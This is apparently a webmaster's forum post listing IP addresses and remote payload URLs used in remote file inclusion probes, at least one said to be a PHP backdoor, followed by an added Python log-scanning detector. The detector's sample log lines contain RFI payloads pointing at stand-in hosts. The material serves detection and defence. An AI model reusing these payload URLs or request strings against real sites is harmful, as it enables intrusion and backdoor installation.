195.139.204.159
198.202.31.141
200.207.39.241
202.123.27.136
202.134.73.251
203.32.125.78
204.11.233.120
206.174.196.12
209.160.33.149
209.31.122.242
211.108.60.242
212.241.199.126
213.189.224.45
213.207.108.27
213.246.39.80
216.117.166.78
216.120.237.150
217.149.150.29
217.160.248.226
217.199.176.169
218.38.13.189
218.38.18.201
220.95.230.123
222.124.175.50
58.137.13.2
58.71.35.204
61.100.0.185
62.113.110.18
62.75.164.177
64.13.250.115
64.20.40.147
64.200.24.130
64.34.247.16
64.79.214.81
65.126.237.102
66.109.18.84
66.178.16.210
66.230.196.115
66.230.196.5
66.46.176.233
67.18.16.82
67.18.233.58
68.58.73.97
70.84.183.58
70.86.11.210
72.233.14.145
72.29.73.59
72.37.212.31
72.55.164.50
72.9.155.230
74.220.202.19
74.52.215.178
80.249.117.82
81.168.228.204
81.21.73.27
82.165.33.50
82.57.96.100
83.12.231.38
85.214.79.169
87.106.131.186
87.106.134.179
87.106.19.184
These IP addresses themselves may not be the culprits, but they are then being exploited by those culprits. So I needed to resolve it, and that was ONE of the things I have done.
These IP addresses were trying to launch any one of the following files (many of which have been shut down):
http://71.102.93.10/WTS/bin/hak/id.txt
http://72.143.157.159/x.asc/r7
http://barcamp.org.uk/bn
http://br.geocities.com/jetynn/rootlab.jpg
http://darkness.ws/xpl/bot/safe.txt
http://glddemo.in/geeklog/logs/data.txt
http://h1.ripway.com/babi/cmd.txt
http://h1.ripway.com/babi/safe.txt
http://h1.ripway.com/logpar/echo.txt
http://h1.ripway.com/MrHappy/x.txt
http://jkjk.site.voila.fr/CMD.txt
http://manxdate.com/id_img/about.gif
http://ngrd.awardspace.com/cmd.txt
http://paginas.terra.com.br/lazer/cezinha/id.txt
http://pucorp.t5.com.br/cmd.txt
http://svurology.com/images/avatars/uploads/id.txt
http://trezze.ezua.com/scan_BoT/id.txt
http://usuarios.arnet.com.ar/alvarezluque/safe.txt
http://usuarios.arnet.com.ar/larry123/safe.txt
http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc
http://www.55thinking.com/doc/echo.txt
http://www.aniversaris.info/images/help.txt
http://www.beramar.xpg.com.br/id.txt
http://www.freewebtown.com/liviupustiu/safe.txt
http://www.freewebtown.com/liviupustiu/u.txt
http://www.h7host.xpgplus.com.br/id.txt
http://www.h7host.xpgplus.com.br/r6.txt
http://www.homedv.net/bht.txt
http://www.mfilter.us/mf/id.txt
http://www.mikeboller.com/cmd.txt
http://www.mohaa.team-empire.info/includes/read.txt
http://www.okgopchat.com/forum/id.txt
http://www.sufcdb.co.uk/comp/mic.txt
http://www.the-esao.com/imag/stringa.txt
http://www.tracanna.net//components/com_poll/images/id
http://www.tracanna.net//components/com_poll/images/id.txt
http://www.wisdom-creation.com/cmd.txt
http://www.youngpods.org/images/data.txt
Now before you go investigating those links... BE WARNED that at least one of them is actually a link to a virus, which is a PHP backdoor. If you are running PHP on a Windows machine, you will be susceptible to it.
Fortunately, it appears that they have not been able to gain access to the resources they wanted, but I am still going through logs. The downside is that they have a net effect of shutting down the MySQL server (creating errors in the various applications).
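The pattern described in this post (a list of source addresses requesting scripts with a query parameter pointing at a remote `.txt` file) is the classic remote file inclusion probe, and it can be pulled out of an ordinary web server access log. The following script is an added example for doing that, not code from the poster or the forum: it parses combined-format log lines, flags any query parameter whose value is a remote URL (percent-encoded or not), strips the trailing `?` that these payloads carry so the include target can be reported by host, and marks whether the source address appears in a blocklist. The three blocklist entries are taken from the address list above; the log lines and the remote hosts in them (`198.51.100.23`, `remote.example`, `www.example.com`) are constructed for the example. The `benign_params` argument exists because legitimate parameters (a redirect target, for instance) also carry URLs, so a deployment needs an allowlist to keep false positives down.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Three of the source addresses listed in the post above; a real deployment
# would load the whole list from a file.
KNOWN_SCANNERS = frozenset({"195.139.204.159", "198.202.31.141", "87.106.19.184"})

# Combined log format as written by Apache/nginx; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log lines. The remote hosts (198.51.100.23, remote.example,
# www.example.com) are documentation/test names, not hosts from the post.
SAMPLE_LOG = """\
198.202.31.141 - - [12/Mar/2007:03:14:07 +0000] "GET /index.php?page=http://198.51.100.23/cmd.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
10.0.0.7 - - [12/Mar/2007:03:15:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2007:03:16:22 +0000] "GET /forum/index.php?inc=http%3A%2F%2Fremote.example%2Fsafe.txt%3F%3F HTTP/1.1" 404 0 "-" "Mozilla/4.0"
10.0.0.8 - - [12/Mar/2007:03:17:45 +0000] "GET /redirect?url=http://www.example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def find_rfi_attempts(lines, benign_params=frozenset()):
    """Return one finding per query parameter whose value is a remote URL.

    benign_params: names of parameters that legitimately carry URLs on this
    site (e.g. a redirect target); those are skipped to cut false positives.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the format we understand
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes, so an encoded http%3A%2F%2F is caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name in benign_params or not REMOTE_SCHEME.match(value):
                continue
            # RFI payloads usually end in "?" or "??" so that whatever the vulnerable
            # script appends becomes a query string for the remote host; strip it
            # before extracting the host the payload would be fetched from.
            remote = urlsplit(value.rstrip("?"))
            findings.append({
                "source_ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "param": name,
                "remote_host": remote.hostname,
                "status": int(m.group("status")),
                "known_scanner": m.group("ip") in KNOWN_SCANNERS,
            })
    return findings


def count_by_source(findings):
    """Number of RFI attempts per source IP, most active first."""
    counts = {}
    for f in findings:
        counts[f["source_ip"]] = counts.get(f["source_ip"], 0) + 1
    return dict(sorted(counts.items(), key=lambda kv: -kv[1]))


if __name__ == "__main__":
    hits = find_rfi_attempts(SAMPLE_LOG.splitlines(), benign_params={"url"})
    for h in hits:
        flag = "LISTED" if h["known_scanner"] else "new"
        print(f'{h["source_ip"]:16} {flag:6} {h["param"]}={h["remote_host"]} -> {h["status"]}')
    print(count_by_source(hits))
```

Run it against a real log with `find_rfi_attempts(open("access.log"))`. A 200 response to one of these requests is the line worth looking at first: a 404 means the script was not there, while a 200 means the vulnerable include path exists and the remote file may have been fetched and executed, which is the point at which the PHP backdoor the post warns about lands on the host.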